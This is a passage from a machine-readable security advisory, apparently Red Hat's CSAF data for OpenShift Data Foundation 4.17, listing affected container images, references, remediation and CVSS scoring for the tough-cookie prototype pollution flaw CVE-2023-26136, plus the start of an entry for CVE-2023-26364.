"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2023-26136", }, { category: "external", summary: "RHBZ#2219310", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2219310", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2023-26136", url: "https://www.cve.org/CVERecord?id=CVE-2023-26136", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2023-26136", url: "https://nvd.nist.gov/vuln/detail/CVE-2023-26136", }, { category: "external", summary: "https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e", url: "https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e", }, { category: "external", summary: "https://github.com/salesforce/tough-cookie/issues/282", url: "https://github.com/salesforce/tough-cookie/issues/282", }, { category: "external", summary: "https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3", url: "https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3", }, { category: "external", summary: "https://lists.debian.org/debian-lts-announce/2023/07/msg00010.html", url: "https://lists.debian.org/debian-lts-announce/2023/07/msg00010.html", }, { category: "external", summary: "https://security.snyk.io/vuln/SNYK-JS-TOUGHCOOKIE-5672873", url: "https://security.snyk.io/vuln/SNYK-JS-TOUGHCOOKIE-5672873", }, ], release_date: "2023-07-01T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "tough-cookie: prototype pollution in cookie memstore", }, { cve: "CVE-2023-26364", cwe: { id: "CWE-20", name: "Improper Input Validation", }, discovery_date: "2023-11-17T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", 